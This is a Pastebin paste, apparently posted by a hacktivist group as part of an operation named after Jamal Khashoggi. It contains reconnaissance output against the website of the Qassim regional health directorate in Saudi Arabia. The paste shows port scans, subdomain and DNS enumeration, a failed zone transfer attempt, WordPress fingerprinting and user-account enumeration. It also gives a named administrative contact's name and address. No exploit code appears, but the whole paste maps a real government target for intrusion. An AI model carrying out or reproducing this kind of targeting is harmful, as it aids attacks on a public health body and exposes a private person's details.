Advertisement
Guest User

Anonymous JTSEC #OpJamalKhashoggi Full Recon #12

a guest
Nov 19th, 2018
529
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 105.99 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname qh.gov.sa ISP Limestone Networks, Inc.
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region Texas Local time 18 Nov 2018 21:32 CST
  7. City Dallas Postal Code 75202
  8. IP Address 192.169.84.216 Latitude 32.778
  9. Longitude -96.805
  10. #######################################################################################################################################
  11. > qh.gov.sa
  12. Server: 194.187.251.67
  13. Address: 194.187.251.67#53
  14.  
  15. Non-authoritative answer:
  16. Name: qh.gov.sa
  17. Address: 192.169.84.216
  18. #######################################################################################################################################
  19. HostIP:192.169.84.216
  20. HostName:qh.gov.sa
  21.  
  22. Gathered Inet-whois information for 192.169.84.216
  23. ---------------------------------------------------------------------------------------------------------------------------------------
  24.  
  25.  
  26. inetnum: 192.169.0.0 - 192.171.0.255
  27. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  28. descr: IPv4 address block not managed by the RIPE NCC
  29. remarks: ------------------------------------------------------
  30. remarks:
  31. remarks: You can find the whois server to query, or the
  32. remarks: IANA registry to query on this web page:
  33. remarks: http://www.iana.org/assignments/ipv4-address-space
  34. remarks:
  35. remarks: You can access databases of other RIRs at:
  36. remarks:
  37. remarks: AFRINIC (Africa)
  38. remarks: http://www.afrinic.net/ whois.afrinic.net
  39. remarks:
  40. remarks: APNIC (Asia Pacific)
  41. remarks: http://www.apnic.net/ whois.apnic.net
  42. remarks:
  43. remarks: ARIN (Northern America)
  44. remarks: http://www.arin.net/ whois.arin.net
  45. remarks:
  46. remarks: LACNIC (Latin America and the Carribean)
  47. remarks: http://www.lacnic.net/ whois.lacnic.net
  48. remarks:
  49. remarks: IANA IPV4 Recovered Address Space
  50. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  51. remarks:
  52. remarks: ------------------------------------------------------
  53. country: EU # Country is really world wide
  54. admin-c: IANA1-RIPE
  55. tech-c: IANA1-RIPE
  56. status: ALLOCATED UNSPECIFIED
  57. mnt-by: RIPE-NCC-HM-MNT
  58. mnt-lower: RIPE-NCC-HM-MNT
  59. created: 2014-11-07T14:14:50Z
  60. last-modified: 2018-09-04T13:31:09Z
  61. source: RIPE
  62.  
  63. role: Internet Assigned Numbers Authority
  64. address: see http://www.iana.org.
  65. admin-c: IANA1-RIPE
  66. tech-c: IANA1-RIPE
  67. nic-hdl: IANA1-RIPE
  68. remarks: For more information on IANA services
  69. remarks: go to IANA web site at http://www.iana.org.
  70. mnt-by: RIPE-NCC-MNT
  71. created: 1970-01-01T00:00:00Z
  72. last-modified: 2001-09-22T09:31:27Z
  73. source: RIPE # Filtered
  74.  
  75. % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
  76.  
  77.  
  78.  
  79. Gathered Inic-whois information for qh.gov.sa
  80. ---------------------------------------------------------------------------------------------------------------------------------------
  81.  
  82. #######################################################################################################################################
  83. [i] Scanning Site: http://qh.gov.sa
  84.  
  85.  
  86.  
  87. B A S I C I N F O
  88. =======================================================================================================================================
  89.  
  90.  
  91. [+] Site Title:
  92. [+] IP address: 192.169.84.216
  93. [+] Web Server: Could Not Detect
  94. [+] CMS: Could Not Detect
  95. [+] Cloudflare: Not Detected
  96. [+] Robots File: Could NOT Find robots.txt!
  97.  
  98.  
  99.  
  100.  
  101. W H O I S L O O K U P
  102. =======================================================================================================================================
  103.  
  104. % SaudiNIC Whois server.
  105. % Rights restricted by copyright.
  106. % http://nic.sa/en/view/whois-cmd-copyright
  107.  
  108. Domain Name: qh.gov.sa
  109.  
  110. Registrant:
  111. MOH-The Directorate for Health Affairs in Qassim Region وزارة الصحة - المديرية العامة للشؤون الصحية بالقصيم
  112. Address: لا يوجد
  113. Buraidah
  114. Saudi Arabia المملكة العربية السعودية
  115.  
  116. Administrative Contact:
  117. Sultan Abdulaziz AlGhaniam سلطان عبدالعزيز الغنيم
  118. Address: King Khalid Road طريق الملك خالد
  119. 51491 Buraidah
  120. Saudi Arabia
  121.  
  122. Technical Contact:
  123. Sultan Abdulaziz AlGhaniam سلطان عبدالعزيز الغنيم
  124. Address: King Khalid Road طريق الملك خالد
  125. 51491 Buraidah
  126. المملكة العربية السعودية
  127.  
  128. Name Servers:
  129. vita.ns.cloudflare.com
  130. dion.ns.cloudflare.com
  131.  
  132. Created on: 2010-01-19
  133. Last Updated on: 2018-11-04
  134.  
  135.  
  136.  
  137.  
  138.  
  139. G E O I P L O O K U P
  140. =======================================================================================================================================
  141.  
  142. [i] IP Address: 192.169.84.216
  143. [i] Country: US
  144. [i] State: Texas
  145. [i] City: Dallas
  146. [i] Latitude: 32.779099
  147. [i] Longitude: -96.802803
  148.  
  149.  
  150.  
  151. S U B N E T C A L C U L A T I O N
  152. =======================================================================================================================================
  153.  
  154. Address = 192.169.84.216
  155. Network = 192.169.84.216 / 32
  156. Netmask = 255.255.255.255
  157. Broadcast = not needed on Point-to-Point links
  158. Wildcard Mask = 0.0.0.0
  159. Hosts Bits = 0
  160. Max. Hosts = 1 (2^0 - 0)
  161. Host Range = { 192.169.84.216 - 192.169.84.216 }
  162.  
  163.  
  164.  
  165. N M A P P O R T S C A N
  166. =======================================================================================================================================
  167.  
  168.  
  169. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-19 04:08 UTC
  170. Nmap scan report for qh.gov.sa (192.169.84.216)
  171. Host is up (0.040s latency).
  172. PORT STATE SERVICE
  173. 21/tcp open ftp
  174. 22/tcp closed ssh
  175. 23/tcp filtered telnet
  176. 80/tcp open http
  177. 110/tcp open pop3
  178. 143/tcp open imap
  179. 443/tcp filtered https
  180. 3389/tcp filtered ms-wbt-server
  181.  
  182. Nmap done: 1 IP address (1 host up) scanned in 1.42 seconds
  183.  
  184.  
  185.  
  186. S U B - D O M A I N F I N D E R
  187. =======================================================================================================================================
  188.  
  189.  
  190. [i] Total Subdomains Found : 2
  191.  
  192. [+] Subdomain: test.qh.gov.sa
  193. [-] IP: 192.169.84.216
  194.  
  195. [+] Subdomain: www.test.qh.gov.sa
  196. [-] IP: 192.169.84.216
  197. #######################################################################################################################################
  198. [?] Enter the target: http://qh.gov.sa/
  199. [!] IP Address : 192.169.84.216
  200. [!] qh.gov.sa doesn't seem to use a CMS
  201. [+] Honeypot Probabilty: 30%
  202. ---------------------------------------------------------------------------------------------------------------------------------------
  203. [~] Trying to gather whois information for qh.gov.sa
  204. [+] Whois information found
  205. [-] Unable to build response, visit https://who.is/whois/qh.gov.sa
  206. ---------------------------------------------------------------------------------------------------------------------------------------
  207. PORT STATE SERVICE
  208. 21/tcp open ftp
  209. 22/tcp closed ssh
  210. 23/tcp filtered telnet
  211. 80/tcp open http
  212. 110/tcp open pop3
  213. 143/tcp open imap
  214. 443/tcp filtered https
  215. 3389/tcp filtered ms-wbt-server
  216. Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds
  217. ---------------------------------------------------------------------------------------------------------------------------------------
  218.  
  219. [+] DNS Records
  220. dion.ns.cloudflare.com. (173.245.59.156) AS13335 Cloudflare Inc United States
  221. vita.ns.cloudflare.com. (173.245.58.238) AS13335 Cloudflare Inc United States
  222.  
  223. [+] MX Records
  224. 0 (213.199.154.106) AS8075 Microsoft Corporation United Kingdom
  225.  
  226. [+] Host Records (A)
  227. jobs.qh.gov.saFTP: (ip-143-95-251-88.iplocal) (143.95.251.88) AS36024 Colo4, LLC United States
  228. test.qh.gov.sa (qh.gov.sa) (192.169.84.216) AS46475 Limestone Networks, Inc. United States
  229. www.test.qh.gov.sa (qh.gov.sa) (192.169.84.216) AS46475 Limestone Networks, Inc. United States
  230.  
  231. [+] TXT Records
  232. "v=spf1include:spf.protection.outlook.com-all"
  233.  
  234. [+] DNS Map: https://dnsdumpster.com/static/map/qh.gov.sa.png
  235.  
  236. [>] Initiating 3 intel modules
  237. [>] Loading Alpha module (1/3)
  238. [>] Beta module deployed (2/3)
  239. [>] Gamma module initiated (3/3)
  240.  
  241.  
  242. [+] Emails found:
  243. ---------------------------------------------------------------------------------------------------------------------------------------
  244. pixel-1542600140522117-web-@qh.gov.sa
  245. pixel-1542600142220335-web-@qh.gov.sa
  246.  
  247. [+] Hosts found in search engines:
  248. ---------------------------------------------------------------------------------------------------------------------------------------
  249. [-] Resolving hostnames IPs...
  250. 143.95.251.88:jobs.qh.gov.sa
  251. 192.169.84.216:www.qh.gov.sa
  252. [+] Virtual hosts:
  253. ---------------------------------------------------------------------------------------------------------------------------------------
  254. ######################################################################################################################################
  255. [+] Hosting Info for Website: qh.gov.sa
  256. [+] Visitors per day: < 200
  257. [+] IP Address: ...
  258. [+] IP Reverse DNS (Host): qh.gov.sa
  259. [+] Hosting Company IP Owner: Bashar Hussain
  260. [+] Hosting IP Range: 192.169.84.208 - 192.169.84.223 (16 ip)
  261. [+] Hosting Address: Rua Pocao, 142, Recife, Pernambuco, 50730-110, BR
  262. [+] Owner Address: Al Rymathiya, OT , KW
  263. [+] Hosting Country: BRA
  264. [+] Owner Country: KWT
  265. [+] Hosting Phone: +1-214-242-3600, +1-214-586-0555
  266. [+] CIDR: 192.169.80.208/29
  267. [+] Owner CIDR: 192.169.84.208/28
  268.  
  269. [+] Hosting CIDR: 192.169.80.0/20
  270.  
  271. [+] NS: vita.ns.cloudflare.com
  272. [+] NS: dion.ns.cloudflare.com
  273. #######################################################################################################################################
  274.  
  275. ; <<>> DiG 9.11.5-1-Debian <<>> qh.gov.sa
  276. ;; global options: +cmd
  277. ;; Got answer:
  278. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1810
  279. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  280.  
  281. ;; OPT PSEUDOSECTION:
  282. ; EDNS: version: 0, flags:; udp: 4096
  283. ;; QUESTION SECTION:
  284. ;qh.gov.sa. IN A
  285.  
  286. ;; ANSWER SECTION:
  287. qh.gov.sa. 61 IN A 192.169.84.216
  288.  
  289. ;; Query time: 122 msec
  290. ;; SERVER: 194.187.251.67#53(194.187.251.67)
  291. ;; WHEN: dim nov 18 23:24:24 EST 2018
  292. ;; MSG SIZE rcvd: 54
  293.  
  294. #######################################################################################################################################
  295.  
  296. ; <<>> DiG 9.11.5-1-Debian <<>> +trace qh.gov.sa
  297. ;; global options: +cmd
  298. . 82773 IN NS d.root-servers.net.
  299. . 82773 IN NS g.root-servers.net.
  300. . 82773 IN NS j.root-servers.net.
  301. . 82773 IN NS b.root-servers.net.
  302. . 82773 IN NS l.root-servers.net.
  303. . 82773 IN NS i.root-servers.net.
  304. . 82773 IN NS f.root-servers.net.
  305. . 82773 IN NS k.root-servers.net.
  306. . 82773 IN NS e.root-servers.net.
  307. . 82773 IN NS c.root-servers.net.
  308. . 82773 IN NS h.root-servers.net.
  309. . 82773 IN NS m.root-servers.net.
  310. . 82773 IN NS a.root-servers.net.
  311. . 82773 IN RRSIG NS 8 0 518400 20181201170000 20181118160000 2134 . XWSkzzoJWVT4hAxoZWucK0MnAtj2MIjze2VLc7yXFmCykjMk8cIJC895 Wp412GSuLdUh332FqQwzgDfd22ShscIphjQMRrmBprzA/YNrgRT/PJ9p Ssd14jQBh1FbbN9E3WhTncExXXmJ1pVRfkC6GMEPSVMM34ELwtjnjJTm tc3WMG9E/Y0VbAbdwjIdKLnOekm+nvmb+mT0HZ0n2mSq5HdX6CPjTavS OD75DR6EUv4CWBFKLpL3Kbxa5kOiIo+W7QSUBRJ0Ti8EJ1CvUVFm/QYK F5ZvDLfC5rt+c6NINA8FLyGpHR35XD2IXmD90cV9PhLEKTaM59d1Gc+o OXAg0A==
  312. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 123 ms
  313.  
  314. sa. 172800 IN NS sa1.dnsnode.net.
  315. sa. 172800 IN NS ns1.nic.net.sa.
  316. sa. 172800 IN NS ns1.isu.net.sa.
  317. sa. 172800 IN NS s2.nic.net.sa.
  318. sa. 172800 IN NS s.nic.net.sa.
  319. sa. 172800 IN NS sa-ns.anycast.pch.net.
  320. sa. 172800 IN NS ns2.nic.net.sa.
  321. sa. 86400 IN DS 22825 8 2 79A442F599B302034C6B635B50EDB3C801BD72936F7642D936F6D9A4 7B7A29BC
  322. sa. 86400 IN RRSIG DS 8 1 86400 20181201170000 20181118160000 2134 . zrSchwnIQz9cd9hj6zKmpOqtBbn67rnEJrhIBC8XWJ99rjbq8nx4HeB+ kGHzQ2cngwlbFPgZKFt3oEdmgfhYMXNLJ5mRT+ezP7MQfjvtBaCFPJwE Oid2m2+oaaNbuRtH43ZbcBtdpXlhnMvNavAZLo+NdhQk7KUj8FK4QObg QepwavVWXaSSaz38MiaLoVzdw9BtgWUG6GOPGupyD1CDiz9EWR/d1gcU MJMPdvEXCWyYhKYmCTEr5vnSkZH2g885rdQBBBHzZKOm2H7rXOg6lNgn sxyYezwInMk9BWgTMPs7bz5A+AShevadQSiCXSHNOu8RNvCsvs9mYr3F MRnw2g==
  323. ;; Received 841 bytes from 192.36.148.17#53(i.root-servers.net) in 114 ms
  324.  
  325. qh.gov.sa. 3600 IN NS dion.ns.cloudflare.com.
  326. qh.gov.sa. 3600 IN NS vita.ns.cloudflare.com.
  327. g75dg7hmve0juol4982jhoobsdn6bgh3.gov.sa. 3600 IN NSEC3 1 1 5 2174B4E5DB5E22BF I3BDV7GTACH085SBC52NJJ1N1EENJ2ME NS SOA RRSIG DNSKEY NSEC3PARAM
  328. g75dg7hmve0juol4982jhoobsdn6bgh3.gov.sa. 3600 IN RRSIG NSEC3 8 3 3600 20181128133818 20181114123901 20031 gov.sa. D9BEpJISsR8ncsaecrUL4lij+sJFGO7OV0P2i5NJ1SSnJIPm//+ts/jA HcMCjGCZlmQIZRg/v+xyqsUDLJDmTkIBa1NTgcNP8QEwYCXPIi4QjC7l l4OsYb1eiKvgonVlfzePEigBBmtjwqMGzRpk3S3FzLqvCvvbeV8vYfDU f1bjaXjd6DCO0gxyFQl8FWK73ZThPI/5JeP0ln8z+5z8QyNQF2JSRykk fY170NflRrCzBzlAXAzW5euCddQIzJsb11yZwLFIEnYIF9IkQIPa83/d IdyBSsLBxEEsB0LXe5qQQcsLCqbCaPx4katdZemODRowJUCnXaKIX1yf p9noaA==
  329. le4j0e5lvai7glmiudk9bb0h4qt9sr39.gov.sa. 3600 IN NSEC3 1 1 5 2174B4E5DB5E22BF RFFFMHIQ9K8JHQ4KOR7PU1TJ353N7C20 NS DS RRSIG
  330. le4j0e5lvai7glmiudk9bb0h4qt9sr39.gov.sa. 3600 IN RRSIG NSEC3 8 3 3600 20181128133905 20181114123901 20031 gov.sa. O+L6+VMvsPN8IpRVemh0Xg8w8xfLyQLxPGBhsvJzRgOi2avu2u03TfKM Nmr3yE44WqjzIDv1+MOyciHjpYMQ9toGNgiqZcvfffWWQglJ/dm3b3xs MAFV/gFcxFiOVZmuXj/ZEmo8N8qxDVXrV+1GWUrXR0OJ/u8mYldLZvIz lwzOf9ORFh+/VVnUK5djnYymi36cs1GxPjZYi3OzFlVwA/fo2vBWcS0R CsXatwTBjgHDPClODvJjrGswAG7p/ZktoAtLHajGerJ90NqnrFe2Gcrl YvNnBJr55XRxhvp8UcVRu3UML1iSY5YkKFN0L2JYyKariTy740Hmr7fq Wyxm9Q==
  331. ;; Received 856 bytes from 86.111.196.9#53(ns2.nic.net.sa) in 182 ms
  332.  
  333. qh.gov.sa. 300 IN A 192.169.84.216
  334. ;; Received 54 bytes from 173.245.59.156#53(dion.ns.cloudflare.com) in 110 ms
  335. #######################################################################################################################################
  336. Ip Address Status Type Domain Name Server
  337. ---------- ------ ---- ----------- ------
  338. 192.169.84.216 host ftp.qh.gov.sa
  339. 143.95.251.88 200 host jobs.qh.gov.sa
  340. 127.0.0.1 host localhost.qh.gov.sa
  341. 192.169.84.216 alias mail.qh.gov.sa
  342. 192.169.84.216 host qh.gov.sa
  343. 192.169.84.216 host ns1.qh.gov.sa
  344. 192.169.84.216 host ns2.qh.gov.sa
  345. 192.169.84.216 host test.qh.gov.sa
  346. 192.169.84.216 alias www.qh.gov.sa
  347. 192.169.84.216 host qh.gov.sa
  348. #######################################################################################################################################
  349. [+] Testing domain
  350. www.qh.gov.sa 192.169.84.216
  351. [+] Dns resolving
  352. Domain name Ip address Name server
  353. qh.gov.sa 192.169.84.216 qh.gov.sa
  354. Found 1 host(s) for qh.gov.sa
  355. [+] Testing wildcard
  356. Ok, no wildcard found.
  357.  
  358. [+] Scanning for subdomain on qh.gov.sa
  359. [!] Wordlist not specified. I scannig with my internal wordlist...
  360. Estimated time about 81.13 seconds
  361.  
  362. Subdomain Ip address Name server
  363.  
  364. ftp.qh.gov.sa 192.169.84.216 qh.gov.sa
  365. jobs.qh.gov.sa 143.95.251.88 ip-143-95-251-88.iplocal
  366. localhost.qh.gov.sa 127.0.0.1 localhost
  367. mail.qh.gov.sa 192.169.84.216 qh.gov.sa
  368. ns1.qh.gov.sa 192.169.84.216 qh.gov.sa
  369. ns2.qh.gov.sa 192.169.84.216 qh.gov.sa
  370. test.qh.gov.sa 192.169.84.216 qh.gov.sa
  371. www.qh.gov.sa 192.169.84.216 qh.gov.sa
  372.  
  373. #######################################################################################################################################
  374.  
  375. Start: 2018-11-19T04:28:07+0000
  376. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  377. 1.|-- 45.79.12.201 0.0% 3 0.9 1.2 0.8 1.9 0.6
  378. 2.|-- 45.79.12.4 0.0% 3 0.7 0.7 0.7 0.8 0.1
  379. 3.|-- 45.79.12.8 0.0% 3 0.6 0.8 0.6 0.9 0.1
  380. 4.|-- 10gigabitethernet3-1.core1.dal1.he.net 0.0% 3 1.2 1.3 1.2 1.4 0.1
  381. 5.|-- limestone-networks-inc.10gigabitethernet6-3.core1.dal1.he.net 0.0% 3 6.0 22.4 1.8 59.4 32.1
  382. 6.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  383. 7.|-- te5-1.bdr1.core2.dllstx3.dallas-idc.com 0.0% 3 3.0 2.0 1.5 3.0 0.9
  384. 8.|-- ge0-2.vl241.cr02-95.dllstx3.dallas-idc.com 0.0% 3 7.1 4.4 1.8 7.1 2.7
  385. 9.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
  386.  
  387. #######################################################################################################################################
  388. [*] Performing General Enumeration of Domain: qh.gov.sa
  389. [-] DNSSEC is not configured for qh.gov.sa
  390. [*] SOA dion.ns.cloudflare.com 173.245.59.156
  391. [*] NS vita.ns.cloudflare.com 173.245.58.238
  392. [*] Bind Version for 173.245.58.238 20171212
  393. [*] NS vita.ns.cloudflare.com 2400:cb00:2049:1::adf5:3aee
  394. [*] Bind Version for 2400:cb00:2049:1::adf5:3aee 20171212
  395. [*] NS dion.ns.cloudflare.com 173.245.59.156
  396. [*] Bind Version for 173.245.59.156 20171212
  397. [*] NS dion.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b9c
  398. [*] Bind Version for 2400:cb00:2049:1::adf5:3b9c 20171212
  399. [*] MX qh-gov-sa.mail.protection.outlook.com 213.199.154.138
  400. [*] MX qh-gov-sa.mail.protection.outlook.com 94.245.120.74
  401. [*] A qh.gov.sa 192.169.84.216
  402. [*] TXT qh.gov.sa v=spf1include:spf.protection.outlook.com-all
  403. [*] Enumerating SRV Records
  404. [-] No SRV Records Found for qh.gov.sa
  405. [+] 0 Records Found
  406. #######################################################################################################################################
  407. [*] Processing domain qh.gov.sa
  408. [+] Getting nameservers
  409. 173.245.58.238 - vita.ns.cloudflare.com
  410. 173.245.59.156 - dion.ns.cloudflare.com
  411. [-] Zone transfer failed
  412.  
  413. [+] TXT records found
  414. "v=spf1include:spf.protection.outlook.com-all"
  415.  
  416. [+] MX records found, added to target list
  417. 0 qh-gov-sa.mail.protection.outlook.com.
  418.  
  419. [*] Scanning qh.gov.sa for A records
  420. 192.169.84.216 - qh.gov.sa
  421. 52.97.130.8 - autodiscover.qh.gov.sa
  422. 52.97.166.168 - autodiscover.qh.gov.sa
  423. 52.97.130.184 - autodiscover.qh.gov.sa
  424. 40.100.173.248 - autodiscover.qh.gov.sa
  425. 52.174.26.23 - enterpriseenrollment.qh.gov.sa
  426. 40.68.223.89 - enterpriseregistration.qh.gov.sa
  427. 192.169.84.216 - ftp.qh.gov.sa
  428. 143.95.251.88 - jobs.qh.gov.sa
  429. 127.0.0.1 - localhost.qh.gov.sa
  430. 52.112.194.14 - lyncdiscover.qh.gov.sa
  431. 192.169.84.216 - mail.qh.gov.sa
  432. 40.126.1.162 - msoid.qh.gov.sa
  433. 40.126.1.128 - msoid.qh.gov.sa
  434. 40.126.1.164 - msoid.qh.gov.sa
  435. 40.126.1.166 - msoid.qh.gov.sa
  436. 40.126.1.130 - msoid.qh.gov.sa
  437. 192.169.84.216 - ns1.qh.gov.sa
  438. 192.169.84.216 - ns2.qh.gov.sa
  439. 52.112.193.203 - sip.qh.gov.sa
  440. 192.169.84.216 - test.qh.gov.sa
  441. 192.169.84.216 - www.qh.gov.sa #######################################################################################################################################
  442. [+] URL: http://qh.gov.sa/
  443. [+] Started: Sun Nov 18 22:35:52 2018
  444.  
  445. Interesting Finding(s):
  446.  
  447. [+] http://qh.gov.sa/
  448. | Interesting Entries:
  449. | - X-Nginx-Cache-Status: EXPIRED
  450. | - X-Server-Powered-By: Engintron
  451. | Found By: Headers (Passive Detection)
  452. | Confidence: 100%
  453.  
  454. [+] http://qh.gov.sa/xmlrpc.php
  455. | Found By: Link Tag (Passive Detection)
  456. | Confidence: 100%
  457. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
  458. | References:
  459. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  460. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  461. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  462. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  463. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  464.  
  465. [+] WordPress version 4.9.8 identified (Latest, released on 2018-08-02).
  466. | Detected By: Emoji Settings (Passive Detection)
  467. | - http://qh.gov.sa/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'
  468. | Confirmed By: Meta Generator (Passive Detection)
  469. | - http://qh.gov.sa/, Match: 'WordPress 4.9.8'
  470.  
  471. [+] WordPress theme in use: qassim_health
  472. | Location: http://qh.gov.sa/wp-content/themes/qassim_health/
  473. | Style URL: http://qh.gov.sa/wp-content/themes/qassim_health/style.css?ver=4.9.8
  474. | Style Name: قالب صحة القصيم
  475. | Style URI: http://osusprog.sa/
  476. | Description: قالب اخر من مؤسسة أسس - قالب صحة القصيم...
  477. | Author: osus
  478. | Author URI: http://osusprog.sa/
  479. |
  480. | Detected By: Css Style (Passive Detection)
  481. |
  482. | Version: 1.0.0 (80% confidence)
  483. | Detected By: Style (Passive Detection)
  484. | - http://qh.gov.sa/wp-content/themes/qassim_health/style.css?ver=4.9.8, Match: 'Version: 1.0.0'
  485.  
  486. [+] Enumerating Users
  487. Brute Forcing Author IDs - Time: 00:00:14 <==> (10 / 10) 100.00% Time: 00:00:14
  488.  
  489. [i] User(s) Identified:
  490.  
  491. [+] 20-2
  492. | Detected By: Author Posts - Author Pattern (Passive Detection)
  493.  
  494. [+] 8
  495. | Detected By: Author Posts - Author Pattern (Passive Detection)
  496. | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  497.  
  498. [+] -19
  499. | Detected By: Author Posts - Author Pattern (Passive Detection)
  500.  
  501. [+] 73
  502. | Detected By: Author Posts - Author Pattern (Passive Detection)
  503. | Confirmed By: Wp Json Api (Aggressive Detection)
  504. | - http://qh.gov.sa/wp-json/wp/v2/users/
  505.  
  506. [+] 19-2
  507. | Detected By: Author Posts - Author Pattern (Passive Detection)
  508.  
  509. [+] 9
  510. | Detected By: Author Posts - Author Pattern (Passive Detection)
  511. | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  512.  
  513. [+] admin
  514. | Detected By: Wp Json Api (Aggressive Detection)
  515. | - http://qh.gov.sa/wp-json/wp/v2/users/
  516. | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  517.  
  518. [+] -13
  519. | Detected By: Wp Json Api (Aggressive Detection)
  520. | - http://qh.gov.sa/wp-json/wp/v2/users/
  521.  
  522. [+] -11
  523. | Detected By: Wp Json Api (Aggressive Detection)
  524. | - http://qh.gov.sa/wp-json/wp/v2/users/
  525.  
  526. [+] -57
  527. | Detected By: Wp Json Api (Aggressive Detection)
  528. | - http://qh.gov.sa/wp-json/wp/v2/users/
  529.  
  530. [+] -3
  531. | Detected By: Wp Json Api (Aggressive Detection)
  532. | - http://qh.gov.sa/wp-json/wp/v2/users/
  533.  
  534. [+] -5
  535. | Detected By: Wp Json Api (Aggressive Detection)
  536. | - http://qh.gov.sa/wp-json/wp/v2/users/
  537.  
  538. [+] -55
  539. | Detected By: Wp Json Api (Aggressive Detection)
  540. | - http://qh.gov.sa/wp-json/wp/v2/users/
  541.  
  542. [+] -2
  543. | Detected By: Wp Json Api (Aggressive Detection)
  544. | - http://qh.gov.sa/wp-json/wp/v2/users/
  545.  
  546. [+] -56
  547. | Detected By: Wp Json Api (Aggressive Detection)
  548. | - http://qh.gov.sa/wp-json/wp/v2/users/
  549.  
  550. [+] Finished: Sun Nov 18 22:37:37 2018
  551. [+] Requests Done: 73
  552. [+] Cached Requests: 4
  553. [+] Data Sent: 15.691 KB
  554. [+] Data Received: 14.661 MB
  555. [+] Memory used: 33.164 MB
  556. [+] Elapsed time: 00:01:44
  557.  
  558. #######################################################################################################################################
  559. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 22:59 EST
  560. Nmap scan report for 192.169.84.216
  561. Host is up (0.11s latency).
  562. Not shown: 472 filtered ports, 3 closed ports
  563. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  564. PORT STATE SERVICE
  565. 80/tcp open http
  566. #######################################################################################################################################
  567. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 22:59 EST
  568. Nmap scan report for 192.169.84.216
  569. Host is up (0.11s latency).
  570. Not shown: 2 filtered ports
  571. PORT STATE SERVICE
  572. 53/udp open|filtered domain
  573. 67/udp open|filtered dhcps
  574. 68/udp open|filtered dhcpc
  575. 69/udp open|filtered tftp
  576. 88/udp open|filtered kerberos-sec
  577. 123/udp open|filtered ntp
  578. 139/udp open|filtered netbios-ssn
  579. 161/udp open|filtered snmp
  580. 162/udp open|filtered snmptrap
  581. 389/udp open|filtered ldap
  582. 520/udp open|filtered route
  583. 2049/udp open|filtered nfs
  584. #######################################################################################################################################
  585. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:00 EST
  586. Nmap scan report for 192.169.84.216
  587. Host is up.
  588.  
  589. PORT STATE SERVICE VERSION
  590. 67/udp open|filtered dhcps
  591. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  592. Too many fingerprints match this host to give specific OS details
  593.  
  594. TRACEROUTE (using proto 1/icmp)
  595. HOP RTT ADDRESS
  596. 1 105.76 ms 10.245.200.1
  597. 2 105.82 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  598. 3 105.85 ms 10gigabitethernet-2-2.par2.he.net (195.42.144.104)
  599. 4 183.95 ms 100ge10-2.core1.ash1.he.net (184.105.213.173)
  600. 5 195.12 ms 184.105.213.69
  601. 6 218.42 ms 100ge12-1.core1.dal1.he.net (184.105.81.170)
  602. 7 219.29 ms 184.105.59.6
  603. 8 ...
  604. 9 220.08 ms 208.115.192.62
  605. 10 219.14 ms 208.115.249.46
  606. 11 ... 30
  607. #######################################################################################################################################
  608. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:02 EST
  609. Nmap scan report for 192.169.84.216
  610. Host is up.
  611.  
  612. PORT STATE SERVICE VERSION
  613. 68/udp open|filtered dhcpc
  614. Too many fingerprints match this host to give specific OS details
  615.  
  616. TRACEROUTE (using proto 1/icmp)
  617. HOP RTT ADDRESS
  618. 1 108.03 ms 10.245.200.1
  619. 2 109.30 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  620. 3 108.34 ms 10gigabitethernet-2-2.par2.he.net (195.42.144.104)
  621. 4 187.16 ms 100ge10-2.core1.ash1.he.net (184.105.213.173)
  622. 5 198.21 ms 184.105.213.69
  623. 6 222.80 ms 100ge12-1.core1.dal1.he.net (184.105.81.170)
  624. 7 253.45 ms 184.105.59.6
  625. 8 ...
  626. 9 228.43 ms 208.115.192.62
  627. 10 224.25 ms 208.115.249.46
  628. 11 ... 30
  629. #######################################################################################################################################
  630. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:04 EST
  631. Nmap scan report for 192.169.84.216
  632. Host is up.
  633.  
  634. PORT STATE SERVICE VERSION
  635. 69/udp open|filtered tftp
  636. Too many fingerprints match this host to give specific OS details
  637.  
  638. TRACEROUTE (using proto 1/icmp)
  639. HOP RTT ADDRESS
  640. 1 106.45 ms 10.245.200.1
  641. 2 106.48 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  642. 3 106.50 ms 10gigabitethernet-2-2.par2.he.net (195.42.144.104)
  643. 4 183.96 ms 100ge10-2.core1.ash1.he.net (184.105.213.173)
  644. 5 196.21 ms 184.105.213.69
  645. 6 219.17 ms 100ge12-1.core1.dal1.he.net (184.105.81.170)
  646. 7 219.76 ms 184.105.59.6
  647. 8 ...
  648. 9 219.40 ms 208.115.192.62
